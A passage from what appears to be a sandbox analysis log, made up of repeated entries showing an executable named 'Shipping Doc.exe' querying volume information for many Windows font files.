          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
